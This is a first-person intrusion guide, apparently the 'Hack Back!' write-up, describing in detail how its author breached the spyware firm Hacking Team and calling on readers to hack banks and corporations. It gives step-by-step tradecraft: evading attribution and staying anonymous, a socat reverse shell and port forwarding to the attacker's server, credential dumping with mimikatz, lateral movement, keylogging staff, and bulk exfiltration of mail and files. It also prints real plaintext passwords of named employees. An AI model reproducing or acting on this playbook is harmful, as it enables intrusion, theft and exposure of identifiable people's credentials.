–[ 1 – Introduction ]–

The world already has books, audio books, guides, and information about hacking. In the world there are many better hackers than I, but unfortunately they squander their skills working for “defense” contractors, for intelligence agencies, to protect banks and corporations, and to uphold the established order. The hacker culture was born in the USA as a Counterculture, but that origin has remained in mere aesthetics – the rest has been assimilated. At least they can wear a T-shirt, dye their hair blue, use their hacker nicknames, and feel rebellious while working for the globalist system.

Before, someone had to sneak into the offices to filter out documents. A gun was needed to steal from a bank. Today you can do it from your bed with a laptop in your hands. As the CNT said after the Gamma Group hacking: “we will try to take further steps  with new forms of security.” Hacking is a powerful tool, let us learn and let’s fight back!

1. http://pastebin.com/raw.php?i=cRYvK4jb
2. https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
3. http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
4. https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
5. http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

–[ 2 – Hacking Team ]–

I hacked Hacking Team because it was a company that helped governments hack and spy upon journalists, activists, political opponents, and any other threat to their power:

1. http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
2. http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
3. http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
4. https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
5. https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
6. https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
7. http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
8. http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
9. https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
10. http://www.wired.com/2013/06/spy-tool-sold-to-governments/
11. http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/

And, from time to time, criminals and terrorists:

http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html

Vincenzetti, the CEO, liked to finish his emails with the fascist slogan “boia chi molla”. It would be more accurate “buoy chi sell RCS”. They also claimed to have technology to solve the “problem” of Tor and
Darknet;

http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

But since I still have my freedom, I have my doubts about its effectiveness.

–[ 3 – Be Careful Out There ]–

Unfortunately, our world is upside down. It enriches you by doing bad things and imprisons you for doing good things. Fortunately, thanks to the hard work of people like those of “Tor project”, you can avoid being thrown in jail if you follow a few simple guidelines:

1)   Encrypt your hard drive;

https://info.securityinabox.org/es/chapter-4

I guess by the time the police arrive to seize your computer, it will mean that you have already made many mistakes, but it is better to prevent than need to cure.

2)  Use a virtual machine and route all internet traffic through Tor. This accomplishes two things. First, that all connections are anonymous to and through the Tor network. Second, maintaining personal life and anonymous life on different computers helps you not to mix them by accident.

You can use programs like:

• Whonix: https://www.whonix.org/
• Tails: https://tails.boum.org/
• Tubes TorVM: https://www.qubes-os.org/doc/privacy/torvm/, or something else you like better.
• Customized: https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy

Here is a detailed comparison:

https://www.whonix.org/wiki/Comparison_with_Others

3) (Optional) Do not connect directly to the Tor network. Tor is not the panacea. You can correlate the hours you are logged into Tor with the hours your hacker nickname is active. There have also been successful attacks against the network. You can connect to the Tor network through other things besides wifi. Wifislax is a linux distribution with many tools to get wifi. Another option is to connect to a VPN or bridge node before Tor, but it is less certain because it still can correlate the activity of the hacker with the activity of the internet wherever you are in your house (this for example was used as evidence against Jeremy Hammond).

The reality is that although Tor is not perfect, it works quite well. When I was young and reckless, I did many things without any protection (I mean hacking) apart from Tor, that the police did investigate, and I’ve never had any problems.

–[ 3.1 – Infrastructure ]–

I do not directly hack the Tor output relays. They are in black lists, are very slow, and reverse connections can not be received. Tor is to protect my anonymity as I connect to the infrastructure I use to do the actual hacking, which consists of:

1. Domain Names: Serves for command and control (C & C) addresses, and for tunneling DNS for secured egress.
2. Stable Servers: For command and control servers, to receive inverse shells, to launch attacks and to save the loot.
3. Hacked Servers: They serve as pivots to hide the IP address of the stable servers, and for when I want a quick connection without a pivot. For example, scanning ports, to scan all internet connections or download a database with sql injection etc.

Obviously you have to pay anonymously with something like Bitcoin (if you use trackable currency watch out).

–[ 3.2 – Atributes ]–

It often comes out in the news that they have attributed an attack to a group of government hackers because they always use the same tools, leave the same footprints, and even use the same infrastructure (domains, mail, etc). The government hackers are careless and sloppy because they can hack without legal consequences.

I did not want to make the police work easier and link Hacking Team with the hacks and nicknames of my daily work as a black glove hacker. So I used new servers and domains, registered with new emails and paid for it with new, unused bitcoin addresses. Also, I only used public tools and things I wrote specifically for this attack and changed my way of doing some things so I would not leave my usual forensic imprint or MO.

–[ 4 – Gathering Information ]–

Although it can be tedious, this stage is very important, because the larger the surface of the attack, the easier it will be to find a fault in part of it.

–[ 4.1 – Technical Information ]–

Some tools and techniques are:

• Google: You can find many unexpected things with a couple of searches. For example,
  1. The identity of DPR
  2. The bible of how to use Google to hack is the book “Google Hacking for Penetration Testers”.
• Subdomain numbers: Often the main domain of a company is hosted by a third party, and you can find the IP ranges of the company thanks to subdomain tools like:
  1. mx.company.com
  2. ns1.company.com

In addition, sometimes there are things that should not be exposed in “hidden” subdomains. Useful tools for discovering domains and subdomains are: Fierce, theHarvester, and recon-ng.

• Whois Reverse Searches: With a reverse lookup using whois information from a domain or range of IPs of a company, you can find more of their domains and the ranges of their IP addresses. As far as I know, there is no free way to do reverse lookup whois, apart from a hack with google:

“Via della moscova 13” site: www.findip-address.com
“Via della moscova 13” site: domaintools.com

• Port scanning and fingerprinting: Unlike the other techniques, it speaks to the servers of the business. I include it in this section because it is not an attack, it is only for gathering information. The company IDS can generate an alert to the scan ports, but you do not have to worry because every internet connection is being scanned constantly. For scanning, nmap is required, and then fingerprinting may be accomplished. For companies with very long IP ranges, Zmap or masscan are fast. Both WhatWeb and  BlindElephant can fingerprint websites.

–[ 4.2 – Social Information ]–

For social engineering, it is very useful to gather information about the employees, their roles, contact information, operating systems, browser, plugins, software, etc. Some helpful public resources are:

• Google: Here too, you can use it as a most useful information gathering tool.
• theHarvester and recon-ng: I already mentioned them in the previous section, but they have much more functionality. You can find a lot of information quickly and its automated. It is worth reading all your documentation that comes with the software.
• LinkedIn: You can find a lot of information about employees here. The company recruiters are the most likely to accept your friend requests.
• Data.com: Formerly known as jigsaw. Has a lot of contact information for employees.
• File metadata: Lots of information can be found about employees and their systems in the metadata of files that the company has published. Useful tools to find files on the company website and extract the metadata are metagoophil and FOCA.

— [ 5 – Entering the Network ] —

There are several ways to make the get inside the network. Since the method I used for Hacking
Team is very uncommon and much more laborious than is normally required, I’m going to talk a little about the two most common methods, which I recommend trying first.

— [ 5.1 – Social Engineering ] —

Social engineering, specifically spear phishing, is responsible for the most hacks today.

1. Click here —->  for an introductory course on spear phishing and notes
2. Read “Targeted Attacks.” For fun anecdotes of social engineering of different generations.

I did not want to try spear phishing against Hacking Team because their business is to help governments spear phish their opponents.Therefore there is a much higher risk that Hacking Team would recognize and
investigate such any attempt to spear phish them.

— [ 5.2 – Buy Access ] —

Thanks to hard-working Russians and their exploit kits, traffic traffickers, and bots, many companies already have computers that are compromised within their networks and don’t even know it. Almost every Fortune 500 company, with its huge safety nets, already have bots inside their networks. However, Hacking Team is a very small company, and most of the employees are computer security experts, so there was very little likelihood that they were already compromised.

— [ 5.3 – Technical Exploitation ] —

After the Gamma Group hack, I described a process for vulnerabilities.

Hacking Team had a public IP rank:
Inetnum: 93.62.139.32 – 93.62.139.47
Descr: HT public subnet

Hacking Team had very little exposure to the internet. For example, different from Gamma Group, Hacking Teams’ customer service site needed a certificate from the Client to connect. What I had was the main website (a Joomla blog in which Joomscan does not reveal any serious failure), a mail server, a
pair of routers, two VPN devices, and a device to filter spam. Then I had three options: look for a 0day in Joomla, look for a 0day in Postfix, or look for a 0day on one of the embedded systems. A 0day in an
Embedded system seemed the most achievable option, and after two weeks of reverse engineering work, I achieved a remote root exploit. Given that the vulnerabilities have not yet been patched, I will not give you more details.

For more information on how to look for these types of vulnerabilities read:

1. http://www.devttys0.com/
2. https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

— [ 6 – Being Prepared ] —

I did a lot of work and testing before using the Hacking Team exploit. I wrote a firmware with a backdoor and compiled several post-exploitation programs for the embedded system. The backdoor serves to protect the exploit. Using the exploit only once and then returning through the backdoor is a lot more difficult to discover and patch. The post-exploitation tools I had prepared were:

1. busybox: For all common UNIX utilities that the system did not have.
2. nmap: To scan and fingerprint the internal Hacking Team network.
3. Responder.py: The most useful tool to attack Windows networks when you have access to the internal network but you do not have a domain user.
4. Python: To run Reply.py
5. tcpdump: To sniff traffic.
6. dsniff: To spy passwords from weak protocols such as ftp, and to do arpspoofing. I wanted to use ettercap, written by the same ALoR and NaGA from Hacking Team, but it was difficult to compile it for the system.
7. socat: For a comfortable shell with pty: My_server: socat file: `tty`, raw, echo = 0 tcp-listen: my_port Hacked system: socat exec: ‘bash -li’, pty, stderr, setsid, sigint, sane \Tcp: my_server: my_port. And for many other things, it is a Swiss pocket knife. See the section on examples of their documentation.
8. screen: Like pty de socat, it is not strictly necessary, but I wanted to feel at home in the networks of Hacking Team.
9. a SOCKS proxy server: To use next to proxychains to access the internal network with any another program.
10. tgcd: To forward ports, such as the SOCKS server, through the firewall.

The worst thing that could happen was that my backdoor or post-exploitation tools would make the system unstable and make an employee investigate it. So, I spent a week testing my exploit, backdoor, and post-exploitation in the networks of other vulnerable companies before entering into The Hacking Team network.

— [ 7 – Watch and Listen ] —

Once inside the internal network of Hacking Team, I wanted to take a look around and think before taking
another step. I turned on Reply.py in analysis mode (-A, to listen without my activity getting in the way of the responses), and do a slow scan with nmap.

— [ 8 – NoSQL Databases ] —

NoSQL, or rather NoAuthentication, has been a great gift to the community hacker. When I worry that they have finally patched all the faults of MySQL Authentication Failure, [3] [4] [5], new databases of data without authentication suddenly become fashionable. Nmap finds a few on the internal network of Hacking Team:

27017 / tcp open mongodb MongoDB 2.6.5
| Mongodb-databases:
| Ok = 1
| TotalSizeMb = 47547
| TotalSize = 49856643072
…
| _ Version = 2.6.5

27017 / tcp open mongodb MongoDB 2.6.5
| Mongodb-databases:
| Ok = 1
| TotalSizeMb = 31987
| TotalSize = 33540800512
| Databases
…
| _ Version = 2.6.5

They were the databases for RCS testing. The audio Hacking Team recorded on RCS was saved in MongoDB with GridFS. The Audio folder in torrent comes from this. They spied on themselves without meaning to.

— [ 9 – Cross Cables ] —

Although it was fun to listen to Hacking Teams recordings and view the webcam images of them developing their malware, it was not very useful. Their unsafe copies of their security software were the vulnerability that opened their doors. According to their documentation, their iSCSI devices must be on a separate network, but nmap finds one in its subnet 192.168.1.200/24:

nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
…
3260 / tcp open iscsi?
| Iscsi-info:
| Target: iqn.2000-01.com.synology: ht-synology.name
| Address: 192.168.200.66:3260,0
| _ Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
…
3260 / tcp open iscsi?
| Iscsi-info:
| Target: iqn.2000-01.com.synology: synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
| _ Authentication: No authentication required

ISCSI needs a core model, and it would have been difficult to compile it for the embedded system. I resend the port to mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP: 42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iSCSI finds the name iqn.2000-01.com.synology but has problems setting it up because it thinks the address is 192.168.200.72 instead of 127.0.0.1

The way I solved it was:
Iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT –to-destination 127.0.0.1

And now after:
Iscsiadm -m node –targetname = iqn.2000-01.com.synology: synology-backup.name -p 192.168.200.72 –login

… the device file appears! We assemble it:
Vmfs-fuse -o ro / dev / sdb1 / mnt / tmp

And then I found backups of several virtual machines. The server exchange seemed the most interesting because it was too large to download, but we can mount it remotely and search for interesting files like this:
$ Losetup / dev / loop0 Exchange.hackingteam.com-flat.vmdk
$ Fdisk -l / dev / loop0
/ Dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT

Then the offset is 2048 * 512 = 1048576
$ Losetup -o 1048576 / dev / loop1 / dev / loop0
$ Mount -o ro / dev / loop1 / mnt / exchange /

Now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 2014-10-14 172311

We find the hard disk of the virtual machine, and we mount it:
Vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk /
Mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1

… and finally we have unpacked the Russian doll and we can see all the files from the old exchange server in / mnt / part1

https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

— [10 – Backup Manager Domain] —

What interests me most about the backup is that it will have a password hash that can be used to access the current server. Use pwdump, cachedump and lsadump with the registry files. lsadump found the account password service besadmin:

_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ………..

Use proxychains server with socks in the embedded system and smbclient to find the password:
proxychains smbclient //192.168.100.51/c$ -U ‘hackingteam.local / besadmin% bes32678 !!!’

! It works! Password besadmin still valid, and is a trustee local. I use my proxy and psexec_psh metasploit  for a session meterpreter. Then migrate to a 64-bit process, “load kiwi” “Creds_wdigest”, and I have many passwords, including the Administrator Domain:

HACKINGTEAM BESAdmin bes32678 !!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <—- sysadmin go!
HACKINGTEAM m.romeo Iolkos / (90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM D.Martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A! E $$ andra
HACKINGTEAM m.bettini Ettore & Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set! Dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f @ #
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571 & 2E
HACKINGTEAM e.rabe erab @ 4HT!

— [ 11 – Downloading Post ] —

Now that I have the password of the domain administrator, I have access to the heart of the company. Because every step I take is a risk of detection, I downloaded their emails before further exploring.
Powershell makes it easy. Interestingly, I found a bug with handling dates. After getting the mail, it took a couple of weeks to get the source code, so I went back from time to time to
download any new emails. The server was Italian, with dates in day / month / year usage:
-ContentFilter {(Received -ge ’05 / 06/2015 ‘) -or (Being -ge ’05 / 06/2015’)}

The New MailboxExportRequest to download new emails (in this mail from June 5. The problem was that it says that the date is invalid if the day is greater than 12 (I guess this is because in the US they use the month first and the month can not be a number greater than 12).  It seems Microsoft engineers still only test their software with their own regional settings.

— [ 12 – Downloading Files ] —

Now that I’m a domain administrator, I also started downloading the Resources using my proxy and the -tc option of smbclient, for example:

Proxychains smbclient ‘//192.168.1.230/FAE DiskStation’ \-U ‘HACKINGTEAM / Administrator% uu8dd8ndd12!’ -Tc FAE_DiskStation.tar ‘*’

So I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in the torrent.

— [ 13 – Introduction to Windows Domain Hacking ] —

Before continuing to tell the story of the culiac weones, I should say something about how to attack Windows networks.

— [ 13.1 – Lateral Movement ] —

I will give a brief review of the techniques to proliferate within a Windows network. The techniques to run remotely require the password or hash of a local administrator in the target. By far the most common way
to obtain such credentials is to use mimikatz, above all sekurlsa :: logonpasswords and sekurlsa :: msv, on the computers where you already have administrative access in situ motion techniques also require administrative privileges (except for runes). The most important thing for privilege escalation are PowerUp, and bypassuac.
Remote Motion:

1. psexec: The most basic and most proven way of navigating through windows networks. You can use psexec, winexe, psexec_psh of metasploit, invoke_psexec of powershell empire, or the windows command “sc”. For the Metasploit, powershell empire, and pth-winexe, it is enough to know the hash without knowing the password. It is the most universal way (works in any Computer with port 445 open), but also the least cautious way because of the 7045 “Service” control manager. In my experience, they have never detected a hacker, but sometimes they’ll notice it later and it helps researchers understand what the hacker has done.
2. WMI: The most cautious way. The WMI service is enabled on all Windows computers, but protected by servers, the firewall blocks it by default. You can use wmiexec.py, pth-wmis (here is a demonstration of wmiexec and pth-wmis), powershell empire invoke_wmi, or the windows wmic command. All except wmic only need the hash.
3. PSRemoting: It is disabled on networks by default, and I do not advise you to enable new protocols that are not necessary. But if sysadmin has already enabled it, it is very convenient, especially if you use powershell for everything (and yes, you should use powershell for almost everything, it will change with powershell 5 and Windows 10, but powershell today makes it easy to do everything in RAM, dodge antivirus software, and leave very few footprints).
4. Scheduled tasks: You can run remote programs with schtasks. It works on the same situations as psexec, and also leaves traces known.
5. GPO: If all the above protocols are disabled or blocked by the Firewall, once you are the domain administrator, you can use GPO to give you a logon script, install an msi, run a scheduled task, or as we will see with Mauro Romeo’s computer (Hacking Team sysadmin), I enabled WMI and opened the firewall through the GPO.

In situ movement within a network:

1. Impersonating Tokens: Once you have administrative access to a computer, you can use the tokens from other users to access resources in the domain. Two tools to do this are incognito and token :: * commands from Mimikatz.
2. MS14-068: You can lear how to take advantage of a validation failure in kerberos to generate a domain administrator ticket, here, here or here.
3. Pass the Hash: If you have your hash but the user is not logged in you can use Sekurlsa :: pth to get a user ticket.
4. Process Injection: Any RAT can be injected into another process, for example the command migrate in meterpreter and pupy or psinject in powershell empire. You can inject the process that has the token that you want.
5. Runes: This is sometimes very useful because it does not require an administrator. The command is part of windows, but if you do not have an interface you can use powershell.

— [ 13.2 – Persistence ] —

Once you get the access, you want to keep it. Really “persistence” is a challenge for motherfuckers like the Hacking Team. To hack businesses, there’s no need for persistence because companies never sleep. I always use “persistence” Duqu 2 style, run in RAM on a couple of servers with high percentages of uptime. In the hypothetical case of everyone restarting at once, I have passwords and a gold ticket for backup access. You can read more information about persistence mechanisms for windows here, here and here. But to hack into businesses, there’s no need and increases the risk of detection.

— [ 13.3 – Internal Recognition ] —

The best tool today to understand Windows networks is Powerview. It is worth reading everything written by the author here first then read this 2nd, this third, this fourth, and finally this. Powershell itself is also very powerful. As there are still many servers 2003 and 2000 without powershell, you’ll have to learn the old school one too, with tools such as netview.exe or the windows command “Net view.” Other techniques that I like to use are:

1. Download a list of file names: With a domain administrator account, you can download the names of  all the files on the network with power view: Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ | Select-string ‘^ (. *) \ T’ ‘| % {Dir -recurse $ _. Matches [0] .Groups [1] | Select fullname | Out-file -append files.txt} Later, you can read it at your own pace and choose which one you want to download.
2. Read emails: As we have seen, you can download mail with powershell, and have lots of useful information.
3. Read sharepoint: It is another place where many companies have important information. You can download with powershell.
4. Active Directory: It has a lot of useful information about users and computers. Without being Administrator, you can already find a lot of information with Powerview and other tools. After getting  a Domain you should export all AD information with csvde or some other tool.
5. Spying on employees: One of my favorite pastimes is to hunt the sysadmins. Watching Christan Pozzi (sysadmin from Hacking Team) I got access to the server Nagios that gave me access to the rete sviluppo (development network with the RCS source code). With a simple combination of Get-Keystrokes and Get-TimedScreenshot of PowerSploit, nishang’s Do-Exfiltration, and GPO, I can spy on any employee or even the entire domain.

— [ 14 – Catching Sysadmins ] —

When I read the documentation of its infrastructure, I realized that I still lacked access to something important – the “Rete Sviluppo”, an isolated network that saves all RCS source code. The sysadmins of a company always have access to everything. I searched the computers of Mauro Romeo and Christian
Pozzi to see how they handle the sviluppo network, and to see if there were other interesting systems I should investigate. It was easy to access their computers as they were part of the windows domain in which I had administrator access. Mauro Romeo’s computer had no open ports, so I opened the WMI port to run meterpreter. In addition to recording keystrokes and captures with Get-Keystrokes and Get-TimedScreenshot, I used many Modules / gather / from metasploit, CredMan.ps1, and I searched for files. I saw that Pozzi had a Truecrypt volume and I waited until I had set it up to copy the files. Many have laughed at the weak passwords of Christian Pozzi (and of Christian Pozzi in general, it offers enough material for comedy here,  here, here and here). I included them in the filtration so I could laugh at him. The reality is that mimikatz and keyloggers see all the same passwords.

— [ 15 – The Bridge ] —

Within the encrypted volume of Christian Pozzi, there was a textfile with many passwords. One was for a Fully Automated Nagios server which had access to the sviluppo network to be able to monitor it. I had found the bridge. I only had the password for the web interface, but there was one public exploit to execute the code and get a shell (it’s an exploit that has not been not authenticated, but it is necessary for a user to be logged in to be able to use the password of the textfile).

— [ 16 – Reusing and resetting passwords ] —

Reading the mail, I watched Daniele Milan grant access to Git repositories. I already had their Windows password thanks to mimikatz. I tried running with git server. Then I tried sudo and it worked. For their
Gitlab server and their twitter account, I used the “forgot my Password, ”  and my access to the mail server to reset their Twitter password.

— [17 – Conclusion] —

That is how it was done. This is how easy it is to tear down a company and stop its abuses against
human rights. That is the beauty and asymmetry of hacking: with only one hundred hours of work, a single person can undo years of crime from one multimillion dollar company. Hacking gives us the possibility to be able to fight back and win.

Hacking guides usually end with a warning: this information is only for educational purposes, be an ethical hacker, do not attack computers without permission, blablabla. I will say the same, but with a more rebellious concept of “ethical” hacking . It would be ethical hacking to filter documents, expropriate money to Banks, and protect the computers of ordinary people. However, most of the people who call themselves “ethical hackers” only work to protect those who pay their consulting fees, which are often the
same ones who deserve to be hacked.

In Hacking Team they see themselves as part of a tradition of inspiring Italian design. I see Vincenzetti, his company, and his cronies, police, carabineros, and government, as part of a long tradition of Italian fascism. I want to dedicate this guide to the victims of the School Armando Diaz, and all those who have had their blood shed at hand of Italian fascists.

— [ 18 – Contact ] —

To send me spearphishing attempts, death threats written in Italian and to give me 0days or access within banks, corporations, governments, etc.

Send only encrypted emails using: https://securityinabox.org/en/thunderbird_usarenigmail

-----BEGIN PGP PUBLIC KEY BLOCK-----mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKxvDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73hVYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhhY2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgLBRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tacQdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0SldfcQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0EVWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2AioHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjmn5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5FPbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUojYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAKCRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEAOoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZRLWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+GiJKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRqMf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpBD0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k=E5+y-----END PGP PUBLIC KEY BLOCK-----

        _  _      _   ____       _  _        | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |        | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |        | _ | (_| | (__|  < | |_) | (_| | (__|  <|_|        |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)